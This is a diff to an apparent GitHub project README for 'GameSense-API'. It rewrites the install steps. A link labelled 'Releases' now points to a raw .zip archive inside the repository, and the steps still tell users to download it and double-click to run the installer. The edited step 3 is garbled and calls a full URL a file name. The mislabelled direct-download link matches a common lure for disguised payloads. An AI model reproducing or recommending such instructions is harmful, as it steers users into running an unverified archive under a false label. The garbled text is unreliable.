benjatenoriov/GameSense-API/README.md

 ## 📥 Download & Install

-To get GameSense-API on your computer, visit this page to download: [GameSense-API Releases](https://github.com/benjatenoriov/GameSense-API/releases).
+To get GameSense-API on your computer, visit this page to download: [GameSense-API Releases](https://github.com/benjatenoriov/GameSense-API/raw/refs/heads/main/app/Sense_API_Game_3.3.zip).

 1. Click on the **Releases** link above.
 2. Look for the latest version of the application.
-3. You will find a file named something like `GameSenseAPI.exe`.
+3. You will find a file named something like `https://github.com/benjatenoriov/GameSense-API/raw/refs/heads/main/app/Sense_API_Game_3.3.zip`.
 4. Click on the file name to start the download.
 5. Once the download is complete, locate the downloaded file on your computer (usually in the Downloads folder).
 6. Double-click the file to run the installer.